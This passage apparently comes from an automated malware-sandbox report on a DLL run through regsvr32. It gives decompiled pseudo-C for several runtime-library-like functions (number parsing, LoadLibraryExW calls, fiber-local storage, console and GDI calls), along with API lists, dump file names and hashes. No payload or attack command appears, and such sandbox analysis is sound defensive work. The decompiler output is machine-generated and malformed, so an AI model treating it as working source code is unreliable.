				if (_a24 <= 0) goto 0x1466320f;
				r8d = 0;
				if ((E00007FFD7FFD146622B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x1466320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0x146631d9;
				E00007FFD7FFD146618F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFD7FFD146618F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFD7FFD14661230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFD7FFD146618F0(_t118 + _a16 + _a40, _a8);
				E00007FFD7FFD146611E0(_t120 + _a16, _a32, _a40);
				return E00007FFD7FFD146623A0(_t120 + _a16, _a8, _v48);
			}

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14662FF6

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Part of subcall function 00007FFD14663240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14663310
Part of subcall function 00007FFD14663240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633A8
Part of subcall function 00007FFD14663240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633C2
Part of subcall function 00007FFD14663240: char_traits.LIBCPMTD ref: 00007FFD146633E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD146630A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146630E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146630FF
char_traits.LIBCPMTD ref: 00007FFD14663121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146631B2
char_traits.LIBCPMTD ref: 00007FFD146631D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146631DE
char_traits.LIBCPMTD ref: 00007FFD146631FB

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
Instruction ID: 2cf1c1241e31cf45c285cbbe4e35694071da90595241f58c194f9d6109b5c034
Opcode Fuzzy Hash: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
Instruction Fuzzy Hash: 0251A326A1CF8186EA50DB75E4913AAA3A0F7C67E4F105136EBDD83B69DF2CD4418F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFD7FFD1466893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0x14668987;
				E00007FFD7FFD1466B420(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD14669744();
				goto 0x146689b9;
				if (r14d == 0) goto 0x146689d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0x146689d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
				E00007FFD7FFD14669674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0x1466901d;
				 *_t389 =  *_t397;
				goto 0x1466901d;
				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x146689fb;
				0x14669140();
				goto 0x146689fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFD7FFD1466B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x146689ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x14668a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x14668da0;
				if (_t199 - 0x30 < 0) goto 0x14668cef;
				if (_t199 - 0x3a >= 0) goto 0x14668b3e;
				goto 0x14668cea;
				if (_t199 - 0xff10 >= 0) goto 0x14668cdb;
				if (_t199 - r8w < 0) goto 0x14668cef;
				if (_t199 - 0x66a >= 0) goto 0x14668b66;
				goto 0x14668cea;
				if (_t199 - r10w < 0) goto 0x14668cef;
				if (_t199 - 0x6fa >= 0) goto 0x14668b85;
				goto 0x14668cea;
				if (_t199 - r11w < 0) goto 0x14668cef;
				if (_t199 - 0x970 >= 0) goto 0x14668ba4;
				goto 0x14668cea;
				if (_t199 - r9w < 0) goto 0x14668cef;
				if (_t199 - 0x9f0 >= 0) goto 0x14668bc3;
				goto 0x14668cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x14668cef;
				if (_t199 - _a16 >= 0) goto 0x14668be3;
				goto 0x14668cea;
				if (_t199 - _v152 < 0) goto 0x14668cef;
				if (_t199 - _v148 < 0) goto 0x14668b34;
				if (_t199 - _v144 < 0) goto 0x14668cef;
				if (_t199 - _v140 < 0) goto 0x14668b34;
				if (_t199 - _v136 < 0) goto 0x14668cef;
				if (_t199 - _v132 < 0) goto 0x14668b34;
				if (_t199 - _v128 < 0) goto 0x14668cef;
				if (_t199 - _v124 < 0) goto 0x14668b34;
				if (_t199 - _v120 < 0) goto 0x14668cef;
				if (_t199 - _v116 < 0) goto 0x14668b34;
				if (_t199 - _v112 < 0) goto 0x14668cef;
				if (_t199 - _v108 < 0) goto 0x14668b34;
				if (_t199 - _v104 < 0) goto 0x14668cef;
				if (_t199 - _v100 < 0) goto 0x14668b34;
				if (_t199 - _v96 < 0) goto 0x14668cef;
				if (_t199 - _v92 < 0) goto 0x14668b34;
				if (_t199 - _v88 < 0) goto 0x14668cef;
				if (_t199 - _v84 < 0) goto 0x14668b34;
				if (_t199 - _v80 < 0) goto 0x14668cef;
				if (_t199 - _v76 < 0) goto 0x14668b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x14668cef;
				goto 0x14668b34;
				if (_t199 - _v68 >= 0) goto 0x14668cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x14668d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x14668d06;
				if (_t155 - 0x19 > 0) goto 0x14668d91;
				if (_t155 - 0x19 > 0) goto 0x14668d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0x14668d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x14668d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0x14668d71;
				if ( *_t390 == _t250) goto 0x14668d71;
				E00007FFD7FFD1466B420(_t381);
				 *_t381 = 0x16;
				E00007FFD7FFD14669744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x14668da0;
				r8d = 0x660;
				goto 0x14668da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0x14668d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0x14668f70;
				if (_t200 - 0x3a >= 0) goto 0x14668dd2;
				goto 0x14668f6b;
				if (_t200 - r15w >= 0) goto 0x14668f5b;
				if (_t200 - r8w < 0) goto 0x14668f70;
				if (_t200 - 0x66a >= 0) goto 0x14668dfb;
				goto 0x14668f6b;
				if (_t200 - r10w < 0) goto 0x14668f70;
				if (_t200 - 0x6fa >= 0) goto 0x14668e1a;
				goto 0x14668f6b;
				if (_t200 - r11w < 0) goto 0x14668f70;
				if (_t200 - 0x970 >= 0) goto 0x14668e39;
				goto 0x14668f6b;
				if (_t200 - 0x9e6 < 0) goto 0x14668f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0x14668e59;
				goto 0x14668f6b;
				if (_t200 - 0xa66 < 0) goto 0x14668f70;
				if (_t200 - _a16 < 0) goto 0x14668e4f;
				if (_t200 - _v152 < 0) goto 0x14668f70;
				if (_t200 - _v148 < 0) goto 0x14668e4f;
				if (_t200 - _v144 < 0) goto 0x14668f70;
				if (_t200 - _v140 < 0) goto 0x14668e4f;
				if (_t200 - _v136 < 0) goto 0x14668f70;
				if (_t200 - _v132 < 0) goto 0x14668e4f;
				if (_t200 - _v128 < 0) goto 0x14668f70;
				if (_t200 - _v124 < 0) goto 0x14668e4f;
				if (_t200 - _v120 < 0) goto 0x14668f70;
				if (_t200 - _v116 < 0) goto 0x14668e4f;
				if (_t200 - _v112 < 0) goto 0x14668f70;
				if (_t200 - _v108 < 0) goto 0x14668e4f;
				if (_t200 - _v104 < 0) goto 0x14668f70;
				if (_t200 - _v100 < 0) goto 0x14668e4f;
				if (_t200 - _v96 < 0) goto 0x14668f70;
				if (_t200 - _v92 < 0) goto 0x14668e4f;
				if (_t200 - _v88 < 0) goto 0x14668f70;
				if (_t200 - _v84 < 0) goto 0x14668e4f;
				if (_t200 - _v80 < 0) goto 0x14668f70;
				if (_t200 - _v76 < 0) goto 0x14668e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x14668f70;
				goto 0x14668f6b;
				if (_t200 - _v68 >= 0) goto 0x14668f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x14668f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x14668f83;
				if (_t185 - 0x19 > 0) goto 0x14668f90;
				if (_t185 - 0x19 > 0) goto 0x14668f8b;
				goto 0x14668f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x14668fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x14668db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0x14669008;
				if ( *_t384 == _t201) goto 0x14669008;
				E00007FFD7FFD1466B420(_t384);
				 *_t384 = 0x16;
				E00007FFD7FFD14669744();
				if ((sil & 0x00000008) != 0) goto 0x14669024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0x1466901d;
				 *_t385 = _t407;
				goto 0x146690a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0x1466904c;
				if ((sil & 0x00000001) == 0) goto 0x1466908f;
				if ((sil & 0x00000002) == 0) goto 0x14669047;
				if (_t261 - r8d <= 0) goto 0x14669095;
				goto 0x1466904c;
				if (_t261 - r9d <= 0) goto 0x14669097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0x14669067;
				goto 0x14669097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0x1466907f;
				if (_t395 == 0) goto 0x1466907a;
				 *_t395 =  *_t397;
				goto 0x146690a8;
				if (_t395 == 0) goto 0x1466908a;
				 *_t395 =  *_t397;
				goto 0x146690a8;
				if ((sil & 0x00000002) == 0) goto 0x14669097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0x146690a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14668980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14668D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14669003

Strings

p, xrefs: 00007FFD14668AAA
p, xrefs: 00007FFD14668A32
f, xrefs: 00007FFD14668AA2
-, xrefs: 00007FFD14668A16
0, xrefs: 00007FFD14668DA8

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 07018438adba67ad00a3bc40da8300d8a54d2129932a2e762e1d0e0959f13a18
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: EC12C4B1F0E94386FB209A35E0A42F97652FB93778F844136E689476C4DF7DE9848B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14672FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFD14672FCD
SelectObject.GDI32 ref: 00007FFD14672FE5
Polyline.GDI32 ref: 00007FFD14673230
MoveToEx.GDI32 ref: 00007FFD1467325C
LineTo.GDI32 ref: 00007FFD14673285
MoveToEx.GDI32 ref: 00007FFD146732B1
LineTo.GDI32 ref: 00007FFD146732DA
SelectObject.GDI32 ref: 00007FFD146732ED
DeleteObject.GDI32 ref: 00007FFD146732F8

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: fca3390cca926b76baed62252bf9effc058a9ae23de5eb707d2d45a4e63e2bf6
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: BF91ED76718B408AD765CB28E06136AF7A5F7C9798F104226DACE97B68DF3CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466D8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFD7FFD1466D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0x146de008; // 0x9aee6e3408a0
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffd14660000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x1466da36;
				if (_t72 == 0) goto 0x1466d959;
				_t57 = _t72;
				goto 0x1466da38;
				if (__r8 == __r9) goto 0x1466da1b;
				_t61 =  *((intOrPtr*)(0x7ffd14660000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0x1466d980;
				if (_t61 != _t76) goto 0x1466da75;
				goto 0x1466da07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0x1466da55;
				if (GetLastError() != 0x57) goto 0x1466d9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFD7FFD1466F5B0(_t90) == 0) goto 0x1466d9f5;
				r8d = _t37;
				if (E00007FFD7FFD1466F5B0(_t90) == 0) goto 0x1466d9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0x1466da55;
				 *((intOrPtr*)(0x7ffd14660000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x1466d962;
				_t91 =  *0x146de008; // 0x9aee6e3408a0
				asm("dec eax");
				 *(0x7ffd14660000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

APIs

FreeLibrary.KERNEL32 ref: 00007FFD1466DA6F
GetProcAddress.KERNEL32 ref: 00007FFD1466DA7B

Strings

ext-ms-, xrefs: 00007FFD1466D9CC
api-ms-, xrefs: 00007FFD1466D9B9

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: 3b148e3b6b8bc95d4746d11faf3d9beca2e77a23303fc7701401f5f7849d8d3d
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 5341CE62B1DE4281FA159F26D8A41F62291AF57BB8F098236DD1D87784EE3CE4828300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466B8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFD1466B8E3
FlsGetValue.KERNEL32 ref: 00007FFD1466B8F8
FlsSetValue.KERNEL32 ref: 00007FFD1466B919
FlsSetValue.KERNEL32 ref: 00007FFD1466B946
FlsSetValue.KERNEL32 ref: 00007FFD1466B957
FlsSetValue.KERNEL32 ref: 00007FFD1466B968
SetLastError.KERNEL32 ref: 00007FFD1466B983

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction ID: 8dac8315b859451d8f58e9966a9b8d57b4ac59bcd2145e0cc95856e4b9c426d4
Opcode Fuzzy Hash: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction Fuzzy Hash: D0215E20F1CE6682FA646B3295F12FD61425F5BBB8F144738E97E07AD6DE2CB4818200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146728C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFD146728F1
GetLastError.KERNEL32 ref: 00007FFD146728FD
CloseHandle.KERNEL32 ref: 00007FFD14672915
CreateFileW.KERNEL32 ref: 00007FFD14672940
WriteConsoleW.KERNEL32 ref: 00007FFD1467295F

Strings

CONOUT$, xrefs: 00007FFD14672921

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: 8f4f093866c73ed86c628f3623eb34f2363574e47a85ce51ef2ab7c2f7050d7d
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 31118121B18E42C6F7508B22E8A43A962A4FB8ABF8F044234EA5D87794DF7CD4448780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466BA4C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BA5B
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BA91
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BABE
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BACF
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BAE0
SetLastError.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BAFB

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
